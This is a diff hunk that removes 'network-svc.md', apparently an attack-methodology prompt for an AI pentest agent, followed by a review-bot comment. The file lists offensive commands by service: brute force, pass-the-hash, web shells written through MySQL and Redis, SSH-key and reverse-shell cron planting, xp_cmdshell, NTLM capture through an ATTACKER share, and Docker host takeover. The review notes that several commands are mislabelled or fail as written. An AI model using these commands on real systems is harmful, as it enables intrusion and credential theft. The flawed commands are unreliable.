|
-
└── Version exploits: web_search("telnet {version} CVE")
|
|
82
|
-
|
|
83
|
-
RDP (3389):
|
|
84
|
-
├── BlueKeep: nmap -Pn --script rdp-vuln-ms12-020 -p 3389 TARGET
|
|
85
|
-
├── Brute force: hydra -l admin -P wordlist rdp://TARGET
|
|
86
|
-
├── NLA bypass: web_search("RDP NLA bypass technique")
|
|
87
|
-
├── Credentials: try EVERY found credential
|
|
88
|
-
└── Pass-the-Hash: xfreerdp /v:TARGET /u:admin /pth:NTLM -sec-nla
|
|
89
|
-
|
|
90
|
-
VNC (5900-5910):
|
|
91
|
-
├── No auth: vncviewer TARGET::5900
|
|
92
|
-
├── Brute force: hydra -P wordlist -s 5900 TARGET vnc
|
|
93
|
-
├── VNC authentication bypass: web_search("VNC auth bypass")
|
|
94
|
-
└── Decrypt stored password: web_search("vnc password decrypt")
|
|
95
|
-
|
|
96
|
-
WinRM (5985/5986):
|
|
97
|
-
├── evil-winrm -i TARGET -u user -p pass
|
|
98
|
-
├── Pass-the-Hash: evil-winrm -i TARGET -u user -H NTLM_HASH
|
|
99
|
-
└── If valid creds → full PowerShell access
|
|
100
|
-
```
|
|
101
|
-
|
|
102
|
-
## 📂 File Sharing Services
|
|
103
|
-
|
|
104
|
-
```
|
|
105
|
-
SMB (139/445):
|
|
106
|
-
├── Null session: smbclient -L //TARGET -N, smbmap -H TARGET -u '' -p ''
|
|
107
|
-
├── Guest: smbmap -H TARGET -u 'guest' -p ''
|
|
108
|
-
├── Enumerate shares: crackmapexec smb TARGET --shares -u '' -p ''
|
|
109
|
-
├── Download everything: smbget -R smb://TARGET/share
|
|
110
|
-
├── Writable share: upload payload (web shell if web-accessible, batch/exe if executed)
|
|
111
|
-
├── Vulnerabilities:
|
|
112
|
-
│ ├── EternalBlue (MS17-010): nmap -Pn --script smb-vuln-ms17-010
|
|
113
|
-
│ ├── PrintNightmare: web_search("printnightmare exploit")
|
|
114
|
-
│ ├── SMB relay: Responder + ntlmrelayx
|
|
115
|
-
│ └── web_search("SMB {version} CVE exploit")
|
|
116
|
-
├── Password spray: crackmapexec smb TARGET -u users.txt -p passwords.txt
|
|
117
|
-
└── Enum: crackmapexec smb TARGET -u user -p pass --users --groups --loggedon-users
|
|
118
|
-
|
|
119
|
-
NFS (2049):
|
|
120
|
-
├── Show exports: showmount -e TARGET
|
|
121
|
-
├── Mount: mount -t nfs TARGET:/share /mnt/nfs
|
|
122
|
-
├── Check no_root_squash → create SUID binary on share → execute on target
|
|
123
|
-
└── web_search("NFS exploitation no_root_squash")
|
|
124
|
-
|
|
125
|
-
Rsync (873):
|
|
126
|
-
├── List modules: rsync -av --list-only rsync://TARGET/
|
|
127
|
-
├── Download: rsync -av rsync://TARGET/share/ ./loot/
|
|
128
|
-
└── If writable: upload malicious crontab/authorized_keys
|
|
129
|
-
```
|
|
130
|
-
|
|
131
|
-
## Database Services
|
|
132
|
-
|
|
133
|
-
```
|
|
134
|
-
MySQL (3306):
|
|
135
|
-
├── mysql -h TARGET -u root (no password)
|
|
136
|
-
├── mysql -h TARGET -u root -p'root' (common passwords)
|
|
137
|
-
├── Brute force: hydra -l root -P wordlist mysql://TARGET
|
|
138
|
-
├── UDF: web_search("mysql UDF privilege escalation")
|
|
139
|
-
├── INTO OUTFILE: SELECT '<?php system($_GET["cmd"]);?>' INTO OUTFILE '/var/www/html/cmd.php'
|
|
140
|
-
├── LOAD_FILE: SELECT LOAD_FILE('/etc/passwd')
|
|
141
|
-
└── web_search("mysql {version} CVE exploit")
|
|
142
|
-
|
|
143
|
-
PostgreSQL (5432):
|
|
144
|
-
├── psql -h TARGET -U postgres (often trust/peer auth)
|
|
145
|
-
├── COPY TO: COPY (SELECT 'shell') TO '/tmp/shell.sh'
|
|
146
|
-
├── pg_read_file: SELECT pg_read_file('/etc/passwd')
|
|
147
|
-
├── Large objects: read/write arbitrary files
|
|
148
|
-
├── Extension: CREATE EXTENSION dblink → SSRF
|
|
149
|
-
└── web_search("postgresql {version} RCE exploit")
|
|
150
|
-
|
|
151
|
-
MSSQL (1433):
|
|
152
|
-
├── impacket-mssqlclient DOMAIN/user:pass@TARGET
|
|
153
|
-
├── xp_cmdshell: EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'whoami'
|
|
154
|
-
├── UNC path: EXEC xp_dirtree '\\ATTACKER\share' → capture NTLMv2
|
|
155
|
-
├── OLE automation: sp_OACreate for command execution
|
|
156
|
-
├── CLR assembly: custom .NET DLL → load and execute
|
|
157
|
-
└── web_search("MSSQL exploitation techniques {year}")
|
|
158
|
-
|
|
159
|
-
Redis (6379):
|
|
160
|
-
├── redis-cli -h TARGET (check no-auth)
|
|
161
|
-
├── INFO → version, OS, memory
|
|
162
|
-
├── Web shell: CONFIG SET dir /var/www/html; CONFIG SET dbfilename shell.php; SET x "<?php system($_GET['cmd']);?>"; SAVE
|
|
163
|
-
├── SSH key: CONFIG SET dir /root/.ssh; CONFIG SET dbfilename authorized_keys; SET x "KEY_DATA"; SAVE
|
|
164
|
-
├── Cron: CONFIG SET dir /var/spool/cron/crontabs; SET x "reverse_shell_cron"; SAVE
|
|
165
|
-
├── Master-slave RCE: MODULE LOAD via replication
|
|
166
|
-
└── web_search("redis {version} RCE exploit")
|
|
167
|
-
|
|
168
|
-
MongoDB (27017):
|
|
169
|
-
├── mongosh mongodb://TARGET:27017 (no auth)
|
|
170
|
-
├── db.adminCommand({listDatabases:1})
|
|
171
|
-
├── Dump all: for each db → show collections → db.collection.find()
|
|
172
|
-
├── Authentication bypass: web_search("mongodb auth bypass")
|
|
173
|
-
└── web_search("mongodb {version} CVE")
|
|
174
|
-
|
|
175
|
-
Elasticsearch (9200):
|
|
176
|
-
├── curl http://TARGET:9200/ → version info
|
|
177
|
-
├── curl http://TARGET:9200/_cat/indices → list all indices
|
|
178
|
-
├── curl http://TARGET:9200/_search?q=password → search for secrets
|
|
179
|
-
├── RCE: web_search("elasticsearch {version} RCE CVE")
|
|
180
|
-
└── Snapshot API → read filesystem
|
|
181
|
-
```
|
|
182
|
-
|
|
183
|
-
## 📧 Other Common Services
|
|
184
|
-
|
|
185
|
-
```
|
|
186
|
-
SMTP (25/587):
|
|
187
|
-
├── User enum: VRFY/EXPN/RCPT TO
|
|
188
|
-
├── Open relay: send from any address
|
|
189
|
-
├── web_search("smtp user enumeration techniques")
|
|
190
|
-
|
|
191
|
-
DNS (53):
|
|
192
|
-
├── Zone transfer: dig axfr @TARGET domain.com
|
|
193
|
-
├── Subdomain brute: fierce, dnsrecon, ffuf
|
|
194
|
-
├── DNS cache snooping: information about internal infrastructure
|
|
195
|
-
└── web_search("DNS exploitation techniques")
|
|
196
|
-
|
|
197
|
-
SNMP (161/162):
|
|
198
|
-
├── snmpwalk -v2c -c public TARGET
|
|
199
|
-
├── Community brute: onesixtyone -c community.txt TARGET
|
|
200
|
-
├── Writable OIDs → RCE: web_search("SNMP RCE write community")
|
|
201
|
-
└── Version 3: credential brute force
|
|
202
|
-
|
|
203
|
-
LDAP (389/636):
|
|
204
|
-
├── Anonymous bind: ldapsearch -x -H ldap://TARGET -s base
|
|
205
|
-
├── User/group enumeration
|
|
206
|
-
├── LDAP injection: see injection.md
|
|
207
|
-
└── Detailed methodology: web_search("LDAP pentesting hacktricks")
|
|
208
|
-
|
|
209
|
-
Docker API (2375/2376):
|
|
210
|
-
├── curl http://TARGET:2375/images/json (if unauthenticated)
|
|
211
|
-
├── Full RCE: docker -H tcp://TARGET:2375 run -v /:/mnt alpine chroot /mnt
|
|
212
|
-
└── Kubernetes: kubectl --server=https://TARGET:6443 get pods
|
|
213
|
-
|
|
214
|
-
Kerberos (88):
|
|
215
|
-
├── User enumeration: kerbrute userenum --dc DC -d DOMAIN users.txt
|
|
216
|
-
├── AS-REP roasting: impacket-GetNPUsers (see ad-attack.md)
|
|
217
|
-
├── Kerberoasting: impacket-GetUserSPNs (see ad-attack.md)
|
|
218
|
-
└── web_search("kerberos attack techniques {year}")
|
|
219
|
-
```
|
|
220
|
-
|
|
221
|
-
## Universal Service Search Pattern
|
|
222
|
-
```
|
|
223
|
-
web_search("{service_name} {version} exploit hacktricks")
|
|
224
|
-
web_search("{service_name} pentesting cheatsheet")
|
|
225
|
-
web_search("{service_name} {version} CVE PoC")
|
|
226
|
-
web_search("{service_name} default credentials")
|
|
227
|
-
web_search("{service_name} security misconfiguration")
|
|
228
|
-
searchsploit {service_name} {version}
|
|
229
|
-
```
|
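Review bot: line 84 `BlueKeep: nmap -Pn --script rdp-vuln-ms12-020 -p 3389 TARGET` pairs the wrong check with the name: `rdp-vuln-ms12-020` tests the 2012 RDP bug (CVE-2012-0002), while BlueKeep is CVE-2019-0708 and needs a dedicated check such as Metasploit's `auxiliary/scanner/rdp/cve_2019_0708_bluekeep`. Three other lines in this hunk fail as written: line 88 combines `/pth:NTLM` with `-sec-nla`, but `/pth` authenticates over CredSSP/NLA (and needs Restricted Admin mode on the target), so disabling NLA removes the path the hash travels on; line 153 `EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; ...` is rejected unless `EXEC sp_configure 'show advanced options', 1; RECONFIGURE;` runs first, because xp_cmdshell is an advanced option; and the cron write on line 164 sets `dir` but never `dbfilename`, so after line 163 the dump lands at `/var/spool/cron/crontabs/authorized_keys`, which cron ignores, and it needs `CONFIG SET dbfilename root` before `SAVE`. Line 139's `INTO OUTFILE` should also carry the caveat that it needs the FILE privilege and an unset `secure_file_priv`. This hunk retires the 229-line `network-svc.md` in full with no replacement visible in the diff, so the same question applies as for the other prompt files: where does 0.90.2 load it from.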